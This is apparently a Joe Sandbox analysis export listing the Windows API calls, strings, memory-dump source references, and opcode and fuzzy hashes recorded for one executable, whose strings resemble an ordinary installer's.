• Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
• Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                                                                                                  • String ID: Creating directory: %s
                                                                                                                                                                                                                                  • API String ID: 2451617938-483064649
                                                                                                                                                                                                                                  • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                                                                                                                  • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                                                                                                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                                                                                                  • API String ID: 2508298434-591603554
                                                                                                                                                                                                                                  • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                                                                                                                  • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                                                                                                                                                  • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                                                                                                                                                  • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: D41500D41520D41540
                                                                                                                                                                                                                                  • String ID: %E
                                                                                                                                                                                                                                  • API String ID: 2153611984-175436132
                                                                                                                                                                                                                                  • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                                                                                                                  • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0044B401
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectReleaseSelect
                                                                                                                                                                                                                                  • String ID: %H
                                                                                                                                                                                                                                  • API String ID: 1831053106-1959103961
                                                                                                                                                                                                                                  • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                                                                                                                  • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                                                                                                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                                                                                                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: %H
• API String ID: 65125430-1959103961
• Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
• Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
• Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
• Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
• Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
• Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
Strings
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
• PendingFileRenameOperations2, xrefs: 00455A4F
• PendingFileRenameOperations, xrefs: 00455A40
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
• Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
• FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
• FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
• Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
• Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetMenu.USER32(00000000), ref: 00421361
• SetMenu.USER32(00000000,00000000), ref: 0042137E
• SetMenu.USER32(00000000,00000000), ref: 004213B3
• SetMenu.USER32(00000000,00000000), ref: 004213CF
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
• Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
Uniqueness
Uniqueness Score: -1.00%
APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B84
• SetTextColor.GDI32(?,00000000), ref: 00416B9E
• SetBkColor.GDI32(?,00000000), ref: 00416BB8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
• Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
Uniqueness
Uniqueness Score: -1.00%
APIs
• WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
• CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
• Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
• Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
• Opcode Fuzzy Hash: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
• Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetDC.USER32(00000000), ref: 0042311E
• EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
• ReleaseDC.USER32(00000000,00000000), ref: 00423144
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CapsDeviceEnumFontsRelease
• String ID:
• API String ID: 2698912916-0
• Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
• Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
Uniqueness
Uniqueness Score: -1.00%
APIs
• RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
                                                                                                                                                                                                                                  • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                                                                                                                                  • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GlobalHandle.KERNEL32 ref: 0040626F
• GlobalUnWire.KERNEL32(00000000), ref: 00406276
• GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
• GlobalFix.KERNEL32(00000000), ref: 00406281
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Global$AllocHandleWire
• String ID:
• API String ID: 2210401237-0
